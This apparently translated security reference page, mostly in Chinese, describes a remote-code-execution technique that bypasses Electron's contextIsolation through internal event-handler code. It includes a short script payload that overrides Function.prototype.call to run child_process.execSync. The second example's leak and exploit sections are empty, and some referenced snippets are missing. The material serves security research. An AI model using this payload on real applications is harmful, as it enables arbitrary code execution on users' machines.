Electron contextIsolation RCE via Electron internal code
示例 1
当页面加载开始时,"exit"事件侦听器总是由内部代码设置。 此事件在导航之前发出:
process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- 不再存在
然后跳到这里:

其中 "self" 是 Node 的 process 对象:

process 对象有一个指向 "require" 函数的引用:
process.mainModule.require
由于 handler.call 将接收 process 对象,我们可以覆盖它以执行任意代码:
<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>
示例 2
获取原型污染中的 require 对象。来自 https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81
泄漏:

利用:

最后更新于